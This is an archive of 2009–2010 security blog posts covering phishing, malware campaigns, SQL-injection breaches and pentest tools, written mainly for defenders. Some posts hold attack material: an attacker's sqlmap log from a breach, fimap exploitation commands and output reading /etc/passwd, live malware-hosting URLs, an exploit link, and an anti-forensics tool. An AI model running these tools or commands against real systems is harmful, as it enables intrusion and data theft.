What are the key risks?
Should in-house lawyers and compliance, privacy and security officers be concerned?
What do in-house lawyers and compliance, privacy and security officers look for to identify cloud computing activities?
How do in-house lawyers and compliance, privacy and security officers quickly understand the new risks and implement controls to reduce these risks?
What can in-house lawyers and compliance, privacy and security officers do to educate executive management?
What does it look like when a company does a great job selecting a cloud vendor? What do they do up front before beginning the due diligence process? What do they do during the due diligence and contract negotiation processes? What risks do they mitigate? What controls do they put into place?
What are important compliance, security and privacy elements for cloud contracts?

Check this interview out.

Tabnabbing: A New Type of Phishing Attack On The Rise

2010-07-06T12:56:00.000-07:00

Have you heard about "Tabnabbing"? It is the term for a new kind of attack, which can be summarized as grabbing a Web browser tab when you aren't looking and making it appear as another site. The attack was discovered and named by Aza Raskin, a security researcher and design expert. The attack takes advantage of user trust and inattention to detail in regard to tabs, and the ability of modern web pages to rewrite tabs and their contents a long time after the page is loaded.

"The exploit employs script to rewrite a page of average interest with an impersonation of a well-known website, when left unattended for some time. A user who returns after a while and sees the rewritten page may be induced to believe the page is legitimate and enter their password and other details which will be used for improper purposes. The attack can be made more likely to succeed if the script checks for well known websites the user has loaded in the past or in other tabs, and loads a simulation of the same websites. This attack can be done even if Javascript is disabled, using the refresh meta element, an HTML attribute used for page redirection that causes a reload of a specified new page after a given time interval."

Apparently all browsers are susceptible to this including Chrome, Firefox, Internet Explorer and Opera (on Windows XP anyway).

How The Attack Works

A user navigates to your normal looking site.
You detect when the page has lost its focus and hasn’t been interacted with for a while.
Replace the favicon with the Gmail favicon, the title with “Gmail: Email from Google”, and the page with a Gmail login look-a-like. This can all be done with just a little bit of Javascript that takes place instantly.
As the user scans their many open tabs, the favicon and title act as a strong visual cue—memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs.
After the user has entered their login information and you’ve sent it back to your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful.

POC Video

The Fix

This kind of attack once again shows how important our work is on the Firefox Account Manager to keep our users safe. User names and passwords are not a secure method of doing authentication; it’s time for the browser to take a more active role in being your smart user agent; one that knows who you are and keeps your identity, information, and credentials safe.

Security BSidesDenver

2010-06-18T12:05:00.000-07:00

"The theme of this Bsides event is Mile High Security, where participants are encouraged to discuss potential future directions of infosec over the next 2-5 years.

BSides Denver will have two tracks (with availability for additional, ad-hoc talks that come up during the event). One track will feature traditional-style presentations; the second track (and additional tracks if needed) will be lightning/open style, wherein talks will be announced in the morning and scheduled on-the-spot."

It is great seeing BSides hosted Denver! Colorado has a lot of great security professionals and more of these types of events should be coming to here.

Erin Jacobs - Compliance Crystal Ball – Future trends in risk-based security framework
Tim Skorick - Browser Extension Malware
Daniel J. Molina - Top 10 Ways IT is Enabling Cybercrime
Davi Ottenheimer - Cloudy with a chance of security
Peter Schawacker - Agile Security, SOC and how Mortman/Hutton ruined my summer vacation
Steve Pordon - Defeating High Security Locks: An Overview
David Willson - When Does Electronic Espionage Become an 'Act of War' and What Options Do Nations Have to Defend Their Networks?
Panel Discussion: Infosec- Looking Towards the Future
Jamey Heary - Sneak Peek at PCI 2.0 Changes

If you are a security professional in Denver, don't just come to BSidesDenver ... get involved in the great discussions that will happen at this event!

Web Historian: Reloaded

2010-06-18T10:29:00.000-07:00

"In the spirit of our long-standing support of free software in the Incident Response community, we are happy to announce the release of Web Historian 2.0. This release is a complete rewrite and revamp of our very popular web history extraction tool. This version of Web Historian comes packed with features and supports Firefox 2/3+, Chrome 3+, and Internet Explorer versions 5 through 8. "

Here is a quick run-down of some of the new features:

Collects web history, cookie history, file download history, and form history into data sets
Simple/powerful UI based on tabbed organization of datasets
Perform a live artifact scan of the local system
Perform an artifact scan of one or more arbitrary history files from all supported browsers
Import results from existing XML scan documents
Data displayed in gridview style with full search, sort, and filter capabilities
Custom filters can be created and applied to one or more data sets
Export data sets to XML, HTML or CSV
Extract and export history files used in live artifact scan
Quick copy/paste selected gridview rows to clipboard
Customizable scan settings can tweak the scan to target specific browsers and data sets
Right-click context menu for narrowing gridview data instantly
Select which columns to display in each dataset
View page thumbnails and indexed content
Export sanitized version of history results to distribute to others
Website Analyzer provides visualization of datasets using bar graphs, pie charts and timelines
Website Profiler shows a quick “report card” of artifacts for various websites

SQL Infections Continue!

2010-06-16T14:49:00.000-07:00

"The malicious iFrame attack infected 1,000 web pages by exploiting vulnerabilities in web applications.

A new malware script surfaced on Friday that used a SQL injection attack to infect about 1,000 web pages with a malicious iFrame. The attack was a variation on last week's robint-us SQL mass infection, which similarly infected an estimated 7,000 Web pages.

Affected sites this time included the websites of Ameristar Casinos, Chicago's WBEZ public radio station, the Service Women's Action Network (for the second time), IndustryWeek, the European platform for food sovereignty, and Spain-holiday. Some of those sites continue to be infected.

Malicious iFrame attacks embed a malicious script in a web page, causing it to connect to a feeder site and download further malicious code. Different attacks then take different tacks, with the script either exploiting a browser vulnerability to run the malicious code automatically, or else attempting to trick a user into running it.

The new malware script points to http://2677.in/yahoo.js. According to security firm Sucuri, the attack script "loads malware from http://2677.in/ie.html, which then calls http://s11.cnzz.com to load the virus.""

Analyzing Dangerous Websites Using URLVoid

2010-06-16T14:11:00.000-07:00

"Urlvoid.com is a FREE service developed by NoVirusThanks Company and started on 21 May 2010 that allows users to scan a website address with multiple scanning engines such as Google Diagnostic, McAfee SiteAdvisor, Norton SafeWeb, MyWOT to facilitate the detection of possible dangerous websites."

Analyzing Malicious PDF Files

2010-06-15T12:06:00.001-07:00

Attackers have been using malicious PDF files for some time as a vector to gain unauthorized access to victim systems. Didier Stevens had a nice article in the Hakin9 magazine explaining the structure of PDF files and how to analyze malicious PDF documents.

On June 9th, 2010, Pareto Logic released a tool to help with your analysis which can be downloaded here.

Another great tool is the online ISEC Lab Wepawet tool.

"Wepawet is a service for detecting and analyzing web-based malware. It currently handles Flash, JavaScript, and PDF files."

Can you still trust your network card?

2010-03-25T09:11:00.000-07:00

During the 2010 CanSecWest international conference in Vancouver, members of ANSSI (French Network and Information Security Agency) described how an attacker could remotely take full control of a particular network card model.

The attack is not OS dependent and depends on system networking cards using the Broadcom NetXtreme chips with ASF activated and configured. Essentially, an attacker is able to exploit the flaw and run arbitrary code inside the network controller (NIC) and perform man in the middle attacks on network connections, access to cryptographic keys on the host platform, or malware injection on the victim’s computer host platform. All of this would be undetected by any prevention or monitoring controls on the victim host!

(Images borrowed from the Paretologic.com Blog)
Connection attempt before exploit .... unsuccessful.

Exploit sent to the victim host.

Connection attempt after exploit .... successful!

I mentioned that security software on the host would not prevent or detect this attack. I am a supporter of the Network Security Monitoring (NSM) concept and fully believe that a victim host within a NSM environment would be detected. Not familiar with NSM? Check out Richard Bejtlich's books, "The Tao of Network Security Monitoring" and "Extrusion Detection".

Configuration Management

2010-03-25T08:54:00.001-07:00

This looks like an interesting and useful tool for the implementation and maintenance of configuration management for multiple linux systems, as well as many other platforms and applications.

"Chef is an open source systems integration framework built to bring the benefits of configuration management to your entire infrastructure. You write source code to describe how you want each part of your infrastructure to be built, then apply those descriptions to your servers. The result is a fully automated infrastructure: when a new server comes on line, the only thing you have to do is tell Chef what role it should play in your architecture.

Chef works by allowing you to write recipes that describe how you want a part of your server (such as Apache, MySQL, or Hadoop) to be configured. These recipes describe a series of resources that should be in a particular state - for example, packages that should be installed, services that should be running, or files that should be written. We then make sure that each resource is properly configured, only taking corrective action when it's necessary. The result is a safe, flexible mechanism for making sure your servers are always running exactly how you want them to be."

Other configuration management frameworks:

Good Bye C&A

2010-02-19T08:52:00.001-08:00

"The most significant change in the Final Public Draft of Special Publication 800-37, Revision 1, is the full transformation of the Certification and Accreditation (C&A) process into the six-step Risk Management Framework (RMF). The revised RMF-based process has the following characteristics:

Promotes the concept of near real-time risk management and ongoing information system authorization through the implementation of robust continuous monitoring processes;
Encourages the use of automation and automated support tools to provide senior leaders the necessary information to take credible, risk-based decisions with regard to the organizational information systems supporting their core missions and business functions;
Integrates information security more closely into the enterprise architecture and system development life cycle;
Provides equal emphasis on the selection, implementation, assessment, and monitoring of security controls, and the authorization of information systems;
Establishes responsibility and accountability for security controls deployed within organizational information systems and inherited by those systems (i.e., common controls); and
Links risk management processes at the information system level to risk management processes at the organization-level through a risk executive (function).

The risk management process described in this publication focuses on the strategic, enterprise-centric, near realtime-based approaches to security assessment and system authorization and provides the capability to more effectively manage information system-related security risks in highly dynamic environments of complex and sophisticated cyber threats, ever increasing system vulnerabilities, and rapidly changing missions. "

Application Security Guidance

2010-02-18T08:21:00.000-08:00

"The 2010 CWE/SANS Top 25 Most Dangerous Programming Errors is a list of the most widespread and critical programming errors that can lead to serious software vulnerabilities. They are often easy to find, and easy to exploit. They are dangerous because they will frequently allow attackers to completely take over the software, steal data, or prevent the software from working at all.

The Top 25 list is a tool for education and awareness to help programmers to prevent the kinds of vulnerabilities that plague the software industry, by identifying and avoiding all-too-common mistakes that occur before software is even shipped. Software customers can use the same list to help them to ask for more secure software. Researchers in software security can use the Top 25 to focus on a narrow but important subset of all known security weaknesses. Finally, software managers and CIOs can use the Top 25 list as a measuring stick of progress in their efforts to secure their software.

The list is the result of collaboration between the SANS Institute, MITRE, and many top software security experts in the US and Europe. It leverages experiences in the development of the SANS Top 20 attack vectors (http://www.sans.org/top20/) and MITRE's Common Weakness Enumeration (CWE) (http://cwe.mitre.org/). MITRE maintains the CWE web site, with the support of the US Department of Homeland Security's National Cyber Security Division, presenting detailed descriptions of the top 25 programming errors along with authoritative guidance for mitigating and avoiding them. The CWE site contains data on more than 800 programming errors, design errors, and architecture errors that can lead to exploitable vulnerabilities."

Detect and Eliminate Computer Assisted Forensics

2009-12-15T10:18:00.000-08:00

"DECAF is a counter intelligence tool specifically created around the obstruction of the well known Microsoft product COFEE used by law enforcement around the world.

DECAF provides real-time monitoring for COFEE signatures on USB devices and running applications. Upon finding the presence of COFEE, DECAF performs numerous user-defined processes; including COFEE log clearing, ejecting USB devices, drive-by dropper, and an extensive list of Lockdown Mode settings. The Lockdown mode gives the user an automated approach to locking down the machine at the first sign of unusual law enforcement activity.

DECAF is highly configurable giving the user complete control to on-the-fly scenarios. In a moments notice, almost every piece of hardware can be disabled and pre-defined files can be deleted in the background. DECAF also gives the user an opportunity to simulate COFEE's presence by sending the application into a 'Spill the cofee' type mode. Simulation gives the user an opportunity to test his or her configuration before going live.

Future versions will have text message and email triggers so in case the computer needs to enter into lockdown mode the user can do it remotely. It will also have notification services where in the case of an emergency, someone can be notified (private torrent tracker admins). DECAF's next release is going to be available in a more light-weight version and/or a windows service."

Cloud WPA Cracking Service

2009-12-14T10:03:00.000-08:00

"WPA Cracker is a cloud cracking service for penetration testers and network auditors who need to check the security of WPA-PSK protected wireless networks.

WPA-PSK networks are vulnerable to dictionary attacks, but running a respectable-sized dictionary over a WPA network handshake can take days or weeks. WPA Cracker gives you access to a 400CPU cluster that will run your network capture against a 135 million word dictionary created specifically for WPA passwords. While this job would take over 5 days on a contemporary dual-core PC, on our cluster it takes an average of 20 minutes, for only $17. "

I am sure that we will start seeing more of these types cloud computing services. Are they trustworthy? Do you know if the 3rd party company that you hired for doing your security assessment is using these types of services? While the ability to your time down to crack passwords is enticing, I cannot place my customer's data with a service that I don't trust.

Would recommend putting asking your security assessment provider if they are using these types of services.

Ah, So True!

2009-12-04T14:21:00.000-08:00

Symantec Website Comprised via Blind SQLi

2009-11-23T21:08:00.000-08:00

February 9, 2009, a hacker going by the alias Unu was able to compromise a website run and owned by Kaspersky Labs using a SQL injection attack. Well, Unu has struck again by successfully attacking a website owned by Symantec using a Blind SQLi vector!!!!

Unu employed two commonly known tools to successfully perform the attack: pangolin and sqlmap

Not familiar with these tools? You should be and should be actively checking your websites with them to find your weaknesses before the attackers do. I personally stay attuned to the tools and techniques of the underground. Most attackers cannot afford expensive tools like Core Impact or HP WebInspect (unless using a pirated copy) so they resort to building tools and scripts that automate tedious yet effective and focused attack techniques. It is important to use the same types of tools that the threat is using, especially if you have no budget or a very limited budget! The Kaspersky and Symantec compromises highlight this fact!

From the words of Unu, "It is clear that we are on Symantec server. Oasis, Northwind, OneCare, etc are important projects Symantec. But they seemed to me particularly interesting 2 databases, highlighted in red in the picture, one related to Norton and Symantecstore. Nortonplus database is huge, contains 91 tables. I will enumerate, without further details."

"One of the tables is TB_MEMBER, which contains 70,356 rows, the data members (for help “I called the tool’s sqlmap)

[16:27:41] [INFO] fetching number of columns ‘M_EMAIL, M_NAME, M_PASS, M_USERID’
entries for table ‘TB_MEMBER’ on database ’symantecstore’
[16:27:41] [INFO] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS VARCHAR(8000
)), CHAR(32)) FROM symantecstore..TB_MEMBER
[16:27:41] [INFO] retrieved: 70356

We randomly selected 6 users, from number 100 to 105, in the table. I was outraged when I saw the result shown by sqlmap. These users passwords are stored in CLEAR TEXT!!!!!!!. (To protect users of those data, we replaced some letters with X’s)"

"And when we put sqlmap’s tool to work, there is little surprise us to find that this table contain 122,152 of Serial Number.

[16:39:22] [INFO] fetching number of columns ‘ProductName, ProductNumber, Serial Number’ entries for table ‘TB_ORDER’ on database ’symantecstore’ [16:39:22] [INFO] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS VARCHAR(8000 )), CHAR(32)) FROM symantecstore..TB_ORDER [16:39:22] [INFO] retrieved: 122152"

SQL Injection is NOT a new issue yet I see a significant number of SQLi vectors posted in malicious forums on a daily basis!

I found data on SQL Injection in the Open Source Vulnerability Database (OSVDB) beginning in 2000. As seen in the graphic above, the threat world began to heavily focus on SQLi vectors in 2005 and has continued to focus on this issue since.

Why are we not getting ahead of this problem? It is time to stop talking about SDLC and start doing it!

Resources:

Guide to Building Secure Web Applications and Web Services (Development Guide)

OWASP Testing Guide V3.0

Top SQL Injection Tools

0-Day for Internet Explorer Released

2009-11-22T12:46:00.000-08:00

Microsoft IE CSS Parsing writing-mode Style Memory Corruption

A vulnerability has been identified in Microsoft Internet Explorer, which could be exploited by attackers to compromise a vulnerable system. This issue is caused by a dangling pointer in the Microsoft HTML Viewer (mshtml.dll) when retrieving certain CSS/STYLE objects via the "getElementsByTagName()" method, which could allow attackers to crash an affected browser or execute arbitrary code by tricking a user into visiting a malicious web page.

Affected Products
Microsoft Internet Explorer 7
Microsoft Internet Explorer 6

Exploit
http://downloads.securityfocus.com/vulnerabilities/exploits/37085.html

Cloud Computing Risk Assessment

2009-11-20T21:48:00.001-08:00

ENISA, supported by a group of subject matter expert comprising representatives from Industries, Academia and Governmental Organizations, has conducted, in the context of the Emerging and Future Risk Framework project, an risks assessment on cloud computing business model and technologies. The result is an in-depth and independent analysis that outlines some of the information security benefits and key security risks of cloud computing. The report provide also a set of practical recommendations.

Open Source Intelligence Gathering for Pentesting

2009-11-17T14:16:00.000-08:00

Wikipedia defines Open Source Intelligence (OSINT) as, "Open source intelligence (OSINT) is a form of intelligence collection management that involves finding, selecting, and acquiring information from publicly available sources and analyzing it to produce actionable intelligence."

A basic form of OSINT was recently used by a group to burglarize celebrities:

"The group, most 18 and 19 years old, used celebrity Web sites, according to investigators, to figure out when their victims — a roster of young Hollywood that also includes Rachel Bilson of “The O.C.,” Ashley Tisdale of “High School Musical” fame and Audrina Patridge of “The Hills”— would be attending premieres and other events and would therefore not be home."

So, what does this have to do with penetration testing? Very rarely do I see a company or talk to individuals that use Competitive Intelligence (CI) or OSINT activities in their testing methodology. This type of activity has been defined in the OSSTMM or the Penetration Testing Framework. Do you know what type of information exists on the Internet about your company (or yourself) that could be used for an attack?

Prior to tools like Maltego, this was a tedious process using tools for individual tasks. A comprehensive list of valuable tools can be found linked in the Penetration Testing Framework under the "Network Footprinting" section. Download them, use them, and think about how the data that they collect could be used to attack you. I bet you may find something that will surprise you!

Milw0rm Dead?!?

2009-11-17T13:33:00.000-08:00

We know for sure the Str0ke, the maintainer of the popular exploit database called milw0rm, is not dead. But what about the milw0rm database? Based on the milw0rm website, RSS feed, and twitter, it appears dead. No need to worry, the folks at OffSec announced that they are taking over milw0rm from str0ke, along with David Kennedy and others.

"The Exploit Database is up and running…survived day 1 . On a last moment fluke, we registered the domain explo.it, which is now also up and running.

The ultimate archive of exploits and vulnerable software and a great resource for vulnerability researchers and security addicts alike. Our aim is to collect exploits from submittals and various mailing lists and concentrate them in one, easy to navigate database. When possible, we've added the vulnerable software for download. We are still in the process of organizing the database. You can Download the relevant exploit by clicking the "D" and when available, download the Vulnerable Application using the "A" link."

We’ve improved the search functions on the site, and imported the “papers” and “shellcode” sections from Milw0rm. We’ve been getting our fist submissions and are processing them almost in real time. We’ve set up an IRC channel on freenode #exploitdb, you are welcome to join in and provide feedback on the database."

There is an Offensive Security Exploit database search plugin, that can be downloaded at:

https://addons.mozilla.org/en-US/firefox/addon/49858/

114 PERL Tools for Enumeration and Testing

2009-11-13T06:36:00.000-08:00

A great post on the PenTestIT blog listing 114 PERL tools that can be used for enumeration and security / penetration testing. These are complimentary tools to be used in your security toolkit.

You might find that you rely on some of the tools as your main tool of choice and some may be used as secondary checks.

Need a methodology for security testing, check out the Open Source Security Testing Methodology Manual (OSSTMM) or the Information Systems Security Assessment Framework (ISSAF).

Another Cyber Security Alliance?

2009-11-13T06:29:00.000-08:00

14 tech firms form cybersecurity alliance for government

"Thirteen leading technology providers, together with Lockheed Martin, today announced the formation of a new cybersecurity technology alliance. The announcement coincided with the opening of a new NexGen Cyber Innovation and Technology Center in Gaithersburg, Md., designed to test and develop new information and cybersecurity solutions for government and commercial customers.

The alliance represents a significant commitment on the part of competing technology companies to work collaboratively on new ways to detect and protect against cyber threats and develop methods that could automatically repair network systems quickly after being attacked.

The companies participating in the Cyber Security Alliance include APC by Schneider Electric, CA, Cisco, Dell, EMC Corp. and its RSA security division, HP, Intel, Juniper Networks, McAfee, Microsoft, NetApp, Symantec and VMware.

...

Croom said the new Cyber Security Alliance, and in particular the ability for experts from participating companies to work jointly on some of the harder problems agencies face, is one of elements that distinguishes the NexGen from other testing facilities."

Facebook Users - Do Not Respond to Emails

2009-11-12T14:38:00.000-08:00

This is explains why I am seeing a lot of FB user/password information being posted in malicious hacking forums!

It is being reported, "Facebook users - already being targeted in a malware campaign - are now under threat from a phishing scam.

Security specialists Symantec report that the company’s systems have picked up fake messages that appear to be sent by the social networking service.

Users will receive an email that looks like an official Facebook invite or a password reset confirmation.

If a duped user clicks on the ‘update’ button they will be redirected a fake Facebook site. They will then be asked to enter a password to complete the updating process.

As soon as the unwitting Facebook user does this, their password is in the hands of cybercriminals.

Dodgy subject lines for the phishing emails are: ‘Facebook account update,’ New login system’ or ‘Facebook update tool’.

The malware campaign that is still targeting Facebook is also propagated via email. This time, the message looks like a Facebook notification that the recipient’s password has been reset.

It includes a zip file that, if opened, launches an .exe file, which Symantec’s Security Response centre says is a net nasty called Trojan.Bredolab.

Once a users’ machine is infected by this malware, it secretly dials back to a Russian domain and, Symantec says, “is most likely becoming part of a Bredolab botnet.”

But it isn’t just Facebook that is being lined up by cybercriminals, MySpace is also under attack."

fimap Tool

2009-11-12T13:38:00.000-08:00

"A little tool for local and remote file inclusion auditing and exploitation. fimap is a little python tool which can find, prepare, scan, audit, exploit and even Google automatically for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It's is currently under heavy development but it's usable. "

## Operating Modes:
-s , --single Mode to scan a single URL for FI errors.
Needs URL (-u). This mode is the default.
-m , --mass Mode for mass scanning. Will check every URL
from a given list (-l) for FI errors.
-g , --google Mode to use Google to acquire URLs.
Needs a query (-q) as Google search query.
-H , --harvest Mode to harvest a URL recursively for new URLs.
Needs a root url (-u) to start crawling there.
Also needs (-w) to write a URL list for mass mode.

## Examples:
1. Scan a single URL for FI errors:
./fimap.py -u 'http://localhost/test.php?file=bang&id=23'
2. Scan a list of URLS for FI errors:
./fimap.py -m -l '/tmp/urllist.txt'
3. Scan Google search results for FI errors:
./fimap.py -g -q 'inurl:include.php'
4. Harvest all links of a webpage with recurse level of 3 and
write the URLs to /tmp/urllist
./fimap.py -H -u 'http://localhost' -d 3 -w /tmp/urllist

Testing example:

fimap v.07_svn by Iman Karim - Automatic LFI/RFI scanner and exploiter.
SingleScan is testing URL: 'http://website/index.php?pg=research/opportunities.index.html'
[OUT] Parsing URL 'http://website/index.php?pg=research/opportunities.index.html'...
[INFO] Fiddling around with URL...
[OUT] Possible file inclusion found! -> 'http://website/index.php?pg=Mlchruls' with Parameter 'pg'.
[OUT] Identifing Vulnerability 'http://website/index.php?pg=research/opportunities.index.html' with Param 'pg'...
[INFO] Scriptpath received: '/var/www/abc'
[INFO] Testing file '/etc/passwd'...
[INFO] Testing file '/proc/self/environ'...
[INFO] Skipping absolute file 'php://input'.
[INFO] Testing file '/var/log/apache2/access.log'...
[INFO] Testing file '/var/log/apache/access.log'...
[INFO] Testing file '/var/log/httpd/access.log'...
[INFO] Testing file '/var/log/apache2/access_log'...
[INFO] Testing file '/var/log/apache/access_log'...
[INFO] Testing file '/var/log/httpd/access_log'...
[INFO] Skipping remote file 'http://www.phpbb.de/index.php'.
[INFO] Skipping remote file 'http://www.uni-bonn.de/Frauengeschichte/index.html'.
[INFO] Skipping remote file 'http://www.kah-bonn.de/index.htm?presse/winterthur.htm'.
#########################################################################################
#[1] Possible File Injection #
#########################################################################################
# [URL] http://website/index.php?pg=research/opportunities.index.html #
# [PARAM] pg #
# [PATH] /var/www/abc #
# [TYPE] Relative Clean #
# [NULLBYTE] No Need. It's clean. #
# [READABLE FILES] #
# [0] /etc/passwd -> ../../../etc/passwd #
#########################################################################################

Project website

New Zeus Malware Campaign

2009-11-09T20:43:00.001-08:00

Most of the incidents that I have been involved with over the last 8 months have involved malware for Zeus. The Zeus malware (a crimeware kit used to deliver banking trojans), also known as Zbot, began a new spam distribution campaign today. This newest campaign follows the model of last week's Facebook UpdateTool, only now targeting MySpace users.

Here is the link that is contained in the SPAM:

http://accounts.myspace.com.iiolii.me.uk/msp/index.php?fuseaction=update&code=(random)&email=(email address)

This website is serving the following malware: /msp/updatetool.exe

File size: 105472 bytes
MD5 : 4c7693219eaa304e38f5f989a8346e51

A VirusTotal Report shows that the malware has changed in both size and signature from earlier versions of the malware detected today.

At least 60 unique domains have been seen being used today for this campaign.

Twitter URL's Abundant with Malware

2009-11-08T20:06:00.000-08:00

According to a recent article, "As many as one in every 500 web addresses posted on Twitter lead to sites hosting malware, according to researchers at Kaspersky Labs who have deployed a tool that examines URLs circulating in tweets.

The spread of malware is aided by the popular use of shortened URLs on Twitter, which generally hide the real website address from users before they click on a link, preventing them from self-filtering links that appear to be dodgy."

The use of Web 2.0 technology has increasingly grown popular within the corporate and government environments. Spammers and virus writers quickly jumped on the use of shortened URL services to obfuscate their nefarious acts. How does a security professional overcome the challenge of protecting their company from a service using shortened URL services (like Twitter)? First thing is to block it if there is no business need for it's use. More C-Level executives are finding a business value of using Twitter to promote their companies or share information on their business.

"In August, Twitter began using a filtering system developed by Google (Safe Browsing API) to detect malicious URLs on its own. The system checks URLs against a blacklist, and either blocks malicious links from being posted, or warns Firefox and Chrome users to think before they click. The filter works only on URLs that are shortened using Bit.ly, the default and most popular URL shortening service on Twitter — it’s backed by the same people behind the microblogging service — or J.mp, an alternative version of Bit.ly that produces even shorter URLs."

Great news and wish I had this information about three weeks ago when I was engaged by a business unit to unblock the Bit.ly service for one of their executive's twitter feed! Oh well, one URL shortening service down and 199 to go!

PenTester Scripting Resource

2009-11-07T07:12:00.000-08:00

"Have you found yourself in the predicament of needing to exploit an application/OS/web page? And you think to yourself, “I just did this last week, but I can't remember what I did”. That's the reason for the PenTester Script website. PenTesters young and old, n00b and l33t can gain access to and knowledge of useful scripts/tricks/tips (security related or not) for the purpose of pen-testing.

A group of PenTesters/Researchers have gotten together with the purpose of posting their useful scripts. Feel free to submit your scripts, we will gladly review them, even post them crediting you. You can submit them at scripts@pentesterscripting.com"

Funny Linux Commands

2009-11-03T11:12:00.001-08:00

% cat "food in cans"
cat: can't open food in cans

% nice man woman
No manual entry for woman.

% "How would you rate Quayle's incompetence?
Unmatched ".

% Unmatched ".
Unmatched ".

% [Where is Jimmy Hoffa?
Missing ].

% ^How did the sex change operation go?^
Modifier failed.

% If I had a ( for every $ the Congress spent, what would I have?
Too many ('s.

% make love
Make: Don't know how to make love. Stop.

% sleep with me
bad character

% got a light?
No match.

% man: why did you get a divorce?
man:: Too many arguments.

% !:say, what is saccharine?
Bad substitute.

% %blow
%blow: No such job.

% \(-
(-: Command not found.

$ PATH=pretending! /usr/ucb/which sense
no sense in pretending!

$ drink matter
matter: cannot create

Month of Facebook Bugs Report

2009-10-12T12:20:00.000-07:00

Have you been asked the question, "I want to use Facebook for business, is it safe?" Well, "Facebook is only as secure as their least secure application." Familiar saying?!? This can be applied to networks, systems, and web applications.

On September 1st, full technical details of cross-site scripting (XSS) vulnerabilities discovered in Facebook applications were posted on a website titled "Month of Facebook Bugs".

A month later, The Month of Facebook Bugs Report has been released.

"The Month of Facebook Bugs, or FAXX Hacks, is a series of reports on vulnerabilities in Facebook applications. The series was a volunteer research project coordinated by an anonymous blogger known as theharmonyguy. All of the vulnerabilities were reported to Facebook and/or relevant application developers prior to their publication."

The findings were focused on cross-site scripting holes in Facebook applications and evidence suggests that many Facebook users fail to understand the distinction between Facebook and third-party applications. All of the vulnerabilities discovered affected over 9,700 Facebook applications and over half of the vulnerabilities affected applications that had passed the Facebook Verified Application program.

As stated on the Facebook Verified Application wiki, "Through Facebook's Application Verification Program, developers can demonstrate their application's commitment to providing a trustworthy user experience that is secure, respectful and transparent." The wiki states the following three attributes for a "Trustworthy application":

Secure: Protects user data and honors privacy choices for everyone across the social graph
Respectful: Values user attention and honors their intentions in communications and actions
Transparent: Explains how features will work and how they won't work, especially in triggering user-to-user communications

This research demonstrates that just because you (and Facebook) trust a third party Facebook application does not mean it is trustworthy (difference between trusted and trustworthy)!

To understand the impact of the identified issues, read the "Anatomy of an Attack" section that explains how viral and information stealing attacks could be performed using the discovered vulnerabilities.

Summary of Findings

Many Facebook applications, even widely used ones or seemingly trustworthy ones, lack basic security precautions.
Specifically, cross-site scripting vulnerabilities were found in a wide range of Facebook applications.
Each such vulnerability can be exploited to execute malicious JavaScript, such as malware delivery.
In addition, such holes allow an attacker to access profile information, including personal details, status updates, and photos, of a victimized user and their friends.
Moreover, these vulnerabilities can be used to send notifications or post feed stories, allowing for viral distribution.
While each application hole affects users who have already authorized the application, clickjacking can often target users who have not.
The series focused on vulnerabilities in legitimate applications, but rogue applications, which could easily exploit clickjacking, have also been noted by others.
All of the vulnerabilities reported in the series have been patched, but attacks that exploit application holes remain possible.
Preventing future problems due to application vulnerabilities requires action from both application developers and Facebook.

I found the report comprehensive and insightful but not surprising. When will developers start following a secure coding standard?!? OWASP has become the defacto standard for secure web application development. Facebook application developers following the OWASP standard would have covered the "Lessons for Developers" section of the report (especially the first two!):

Sanitize all inputs. That includes every bit of data processed by the application, whether loaded from a Facebook user’s profile, loaded from a database, submitted with a form, or received from the query string of an address. Never assume that a given parameter will be clean or of the expected type.
Sanitize all outputs. When displaying a notice or error message, load predetermined strings instead of using dynamic inputs. Never reuse the address of a page without fitering it for injection attempts. Filter any information you output to an application page or via an AJAX interface.
Avoid user-generated HTML. Generally, users should never be allowed to input HTML, FBML, or other rich-text formats. When allowing rich-text data, use pre-built, tested code for processing and displaying it, rathering than trying to create your own filters.
Check every page. Many vulnerabilities appear in secondary pages, such as ad loaders or AJAX interfaces. Verify security precautions in every part of the application. If possible, consider storing secondary files in a folder other than that of the application’s canvas pages.
Verify Facebook sessions. Never rely on a cookie, a query string, or data generated within the application to verify the current user. Facebook provides applications with session information they can always check before making requests or loading information.
Use server whitelisting. If your application does not use AJAX or does not otherwise make requests using the Facebook JavaScript API, take advantage of the server whitelist feature in the application properties and only allow requests from your server.
Understand third-party code. Take the time to examine any code given to you by other developers, such as JavaScript tools or advertising network receiver files, before including them in your application. In particular, third-party code that arnesses a user’s session secret violates rules given by Facebook.
Don’t simply obfuscate. Never rely on JavaScript obfuscation or compression to hide vulnerabilities in application pages. Such techniques may slow down an attacker for a short while, but they can always be worked around or reversed.
Educate your users. Avoid incorporating design patterns that train users to accept bad practices, such as entering third-party passwords. Communicate clearly your policies on privacy, data retention, and information security.

Secure coding is not a new concept and has been debated many times on why it is not a common practice. There is absolutely NO reason why it is not!!! We have a responsibility to the users of our applications and systems to protect their data that they have entrusted with us.

As stated on the CERT Secure Coding website:
"Easily avoided software defects are a primary cause of commonly exploited software vulnerabilities. The CERT/CC has observed, through an analysis of thousands of vulnerability reports, that most vulnerabilities stem from a relatively small number of common programming errors. By identifying insecure coding practices and developing secure alternatives, software developers can take practical steps to reduce or eliminate vulnerabilities before deployment."

Get Your Security Answers at SecurityCrunch

2009-10-10T19:05:00.000-07:00

Have you heard of Stack Overflow, Fault Server, Super User, or DocType? All are free question and answer web sites on specific topics using FogSoftware's award winning knowledge engine and similar to wikipedia. Today, I received an email about a new site, using the same technology, called SecurityCrunch.

The originator of SecurityCrunch stated, "The goal of securitycrunch is to become the #1 trafficked site for security questions and answers."

As with all new projects, it's success will be determined by the number of people using and contributing to it. If done correctly, this resource should be helpful for any techie looking for a specific technical answer or a security manager seeking security policy, procedural, and strategy information. Yes, you can use Google to look for answers. Yes, you can use a mailing list to find answers to your questions. Both of these resources can provide varying results, may lead you to unreliable or vendor marketing resources, and can be time consuming. SecurityCrunch limits this by providing a "reputation" metric for each user on the website. If a user posts a good question or answer, they will gain points, if not, they will lose points. All voting is driven by the SecurityCrunch community and all content is collaboratively edited by the community!

SecurityCrunch uses "tags" for the categorization of questions and answers that will allow a user to easily search for specific topics.

